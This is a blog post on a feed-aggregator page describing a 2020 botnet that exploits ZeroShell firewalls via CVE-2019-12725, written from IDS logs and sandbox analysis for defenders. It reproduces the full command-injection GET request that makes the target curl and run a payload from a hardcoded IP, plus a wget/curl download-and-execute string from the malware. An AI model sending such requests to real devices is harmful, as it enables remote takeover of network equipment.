惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Application and Cybersecurity Blog
Application and Cybersecurity Blog
A
About on SuperTechFans
S
SegmentFault 最新的问题
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Help Net Security
Help Net Security
有赞技术团队
有赞技术团队
博客园 - 【当耐特】
O
OpenAI News
美团技术团队
月光博客
月光博客
Apple Machine Learning Research
Apple Machine Learning Research
Schneier on Security
Schneier on Security
Webroot Blog
Webroot Blog
Cyberwarzone
Cyberwarzone
Hacker News - Newest:
Hacker News - Newest: "LLM"
Google Online Security Blog
Google Online Security Blog
T
Tenable Blog
S
Security Affairs
博客园_首页
S
Schneier on Security
Security Latest
Security Latest
T
Threat Research - Cisco Blogs
T
Tailwind CSS Blog
大猫的无限游戏
大猫的无限游戏
Spread Privacy
Spread Privacy
量子位
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
K
Kaspersky official blog
Hugging Face - Blog
Hugging Face - Blog
TaoSecurity Blog
TaoSecurity Blog
博客园 - 聂微东
Vercel News
Vercel News
M
MIT News - Artificial intelligence
T
Troy Hunt's Blog
B
Blog
MongoDB | Blog
MongoDB | Blog
Martin Fowler
Martin Fowler
Attack and Defense Labs
Attack and Defense Labs
L
LINUX DO - 最新话题
D
DataBreaches.Net
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Stack Overflow Blog
Stack Overflow Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
博客园 - Franky
W
WeLiveSecurity
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
F
Fortinet All Blogs
www.infosecurity-magazine.com
www.infosecurity-magazine.com
C
Check Point Blog
H
Hacker News: Front Page

Posts on Noah Bailey

How to turn anything into a router Deploy to Cloudfront from GitHub using OpenID Connect Backup Postgres databases with Kubernetes CronJobs The spelling error made 200 billion times a day Restarting Kubernetes pods using a CronJob You've just bought a new domain. Now what? Who Sawed My Motherboard??? Linux on the P8 Aliexpress Mini Laptop Recovering Mysql/Mariadb after a nasty crash Using EXIF data to pick my next lens Converting and developing RAW photos on Linux automatically Thank you, 2016 iPhone Don't Make It Work Self-hosted Surveillance with ZoneMinder Backups, Monitoring, and Security for small Mastodon servers Block web scanners with ipset & iptables Executing commands over SSH with GitHub Actions Debian Sid on encrypted ZFS Protect your dangerously insecure redis server Debian: the luxurious boring lifestyle Monitor radiation with a Raspberry Pi Simple Linux server alerts: Know your performance, errors, security, syslog, and security NUC crashes on debian 11 - How I fixed it Basic Linux server security with fail2ban, ossec, and firewall Windows 11 will create heaps of needless trash Domesticated Kubernetes Networking The Cursed Certificate Our mostly disposable and entirely stupid world Trying out OpenBSD (as a Linux geek) Making VoIP Calls with Antique Rotary Phones Monitoring WAN speed with speedtest-cli and ElasticSearch Monitoring WAN latency with InfluxDB The Zeroshell botnet returns Installing Gentoo on a vintage Thinkpad T60 Malware emails 2: Russian boogaloo TP-Link Device Weirdness ElasticSearch broke all my nice things (a story of cascading failure) Malware on the Wire: Monitoring Network Traffic with Suricata and ClamAV Cloud Threat Protection with OSSEC and Suricata Malware Emails From Jerks Surviving the Apocalypse with an Offline Wikipedia Server Being Attacked by Bots Linux Router, Firewall and IDS Appliance You Probably Don't Need a VPN Fix an Oversharded Elasticsearch Cluster Automating KVM Virtualization Update all your linux servers as fast as possible Cleanup Systemd Journald Storage Stop Putting Your SSH Keys on Github! Clustering KVM with Ceph Storage Stealing Windows Sessions FreeRadius Active Directory Integration Retrieving WPA2 Keys on Windows Deploy MDT Litetouch on Linux with TFTPD and Syslinux Generating MSI transform files with Orca The Inflatable Dinghy Generating Cisco IOS config files with Python Homebrew SAN Getting Cloudy
A New Botnet is Targeting Network Infrastructure
2020-08-05 · via Posts on Noah Bailey

Starting a little less than two weeks ago, my IDS sensors have been detecting the spread of a new botnet. Unlike previous Mirai botnets, this appears to specifically target the GNU/Linux firewall distribution, “ZeroShell”. While it’s not especially dangerous as far as botnets are concerned, it does appear to be rather vigorous when it sends probes.

However, we got lucky this time. Just as quickly it appeared, the C&C server went offline stopping the spread of this worm dead in its tracks. Still, this serves as a useful lesson to every network admin - patch soon; patch often.

CVEs

This particular exploit is CVE-2019-12725, a CVSS 9.8 vulnerability in the HTTP parser that can lead to remote code execution with a crafted GET request. Though this appears to be a (fairly) old vulnerability, hackers have been working hard recently to exploit unpatched devices.

The maintainers of ZeroShell have also addressed this vulnerability on their official blog. The date of the CVE and subsequent blog post are both nearly a year ago at this point, so most devices should have been patched by now.

Exploit

According to my ElasticSearch database, the first hit on my home server was 2020/07/20, and originated from Guangzhou, China. However, the first time that an alert was generated was 2020/07/25. This makes sense, since the ET rule that identified this exploit (id 1:2030597) was only created on 2020/07/24.

Since then, I have observed exploitation attempts from over 50 unique IPs, from China, Russia, South Korea, Canada, UK, Norway, and the United States. At this point, it’s safe to say this is a widespread issue only limited by the size of the ZeroShell user community.

Indicators

An exploitation attempt will likely leave this in your HTTPD logs:

183.60.213.205 - - [20/Jul/2020:09:03:23 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 301 178 "-" "-"

Chasing down the exploit was rather interesting. Soon after discovering this malware, I submitted a sample to CrowdStrike’s free sandbox:

https://www.hybrid-analysis.com/sample/18c164f8a12e26fa7960feb35e762b5c34d223e75b5d0b22c8736bb875041d07/5f11f67622e86b52232a7f8a

The first stage was a simple bash script which attempts to download and run various payloads depending on the CPU architecture (mips, arm, x86 etc). Then, the second stage malware is downloaded. I analyzed the x86 version, since it will easily run inside the sandbox environment:

https://www.hybrid-analysis.com/sample/6027d9ec503f69dbb58560a63e6acd62d7ab93f36bf8f676d282394a0e55be95/5f1203b1c5a55050bc05ffb4

Interesting content

The executable is a statically linked, stripped ELF binary. Looking inside it, there are some interesting strings:

 shell:cd /data/local/tmp; busybox wget http://5.206.227.228/wget -O -> wwww; sh wwww; curl -O http://5.206.227.228/curl; sh curl; rm wwww curl

This command downloads two additional scripts from the same server, wget or wwww and curl. Despite the familiar names, these are indeed malware scripts. Unfortunately, by the time I noticed these the server had been taken down or blocked.

Also contained in the binary is a link to a youtube video, titled “NOW YOU FUCKED UP” https://www.youtube.ru/watch?v=OGp9P6QvMjY

I am not sure if the creator of the video is at all affiliated with this malware sample, and I won’t speculate.

Stroke of Luck

Thankfully, the server that was distributing the malware quickly went offline.

Today the server seems to be dormant, at least according to Shodan: https://www.shodan.io/host/5.206.227.228

And, fortunately the binaries analyzed had the IP address hardcoded in, meaning that the hosts already infected won’t spread anymore.

Full Event Details

A sample event is provided:

{
  "_index": "logstash-2020.07",
  "_type": "doc",
  "_id": "xxxx",
  "_version": 1,
  "_score": null,
  "_source": {
    "dest_port": 80,
    "tags": [
    ],
    "log": {
      "file": {
        "path": "/var/log/suricata/eve.json"
      }
    },
    "beat": {
      "version": "6.8.10",
      "hostname": "fw",
      "name": "fw"
    },
    "app_proto": "http",
    "source": "/var/log/suricata/eve.json",
    "tx_id": 0,
    "timestamp": "2020-07-25T08:14:37.117055-0400",
    "flow_id": 0000000,
    "host": {
      "name": "fw"
    },
    "offset": 0000000,
    "flow": {
      "pkts_toserver": 4,
      "bytes_toserver": 390,
      "bytes_toclient": 566,
      "pkts_toclient": 4,
      "start": "2020-07-25T08:14:36.413400-0400"
    },
    "@timestamp": "2020-07-25T12:14:38.095Z",
    "proto": "TCP",
    "prospector": {
      "type": "log"
    },
    "alert": {
      "metadata": {
        "deployment": [
          "Perimeter"
        ],
        "former_category": [
          "MALWARE"
        ],
        "performance_impact": [
          "Low"
        ],
        "signature_severity": [
          "Major"
        ],
        "updated_at": [
          "2020_07_24"
        ],
        "created_at": [
          "2020_07_24"
        ],
        "attack_target": [
          "Networking_Equipment"
        ]
      },
      "category": "Attempted Administrator Privilege Gain",
      "action": "allowed",
      "rev": 2,
      "signature_id": 2030597,
      "gid": 1,
      "signature": "ET EXPLOIT [401TRG] ZeroShell RCE Inbound (CVE-2019-12725)",
      "severity": 1
    },
    "src_ip": "183.60.213.205",
    "@version": "1",
    "src_port": 5157,
    "event_type": "alert",
    "stream": 1,
    "input": {
      "type": "log"
    },
    "in_iface": "eth0",
    "http": {
      "url": "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22",
      "http_method": "GET",
      "protocol": "HTTP/1.0",
      "length": 0
    },
    "geoip": {
      "city_name": "Guangzhou",
      "location": {
        "lon": 113.25,
        "lat": 23.1167
      },
      "country_name": "China",
      "region_code": "44",
      "ip": "183.60.213.205",
      "region_name": "Guangdong",
      "country_code3": "CN",
      "timezone": "Asia/Shanghai",
      "longitude": 113.25,
      "continent_code": "AS",
      "latitude": 23.1167,
      "country_code2": "CN"
    },
    "dest_ip": "10.x.x.x"
  },
  "fields": {
    "flow.start": [
      "2020-07-25T12:14:36.413Z"
    ],
    "@timestamp": [
      "2020-07-25T12:14:38.095Z"
    ]
  },
  "highlight": {
    "event_type": [
      "@kibana-highlighted-field@alert@/kibana-highlighted-field@"
    ],
    "http.url": [
      "/cgi-bin/@kibana-highlighted-field@kerbynet@/kibana-highlighted-field@?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22"
    ]
  },
  "sort": [
    1595679278095
  ]
}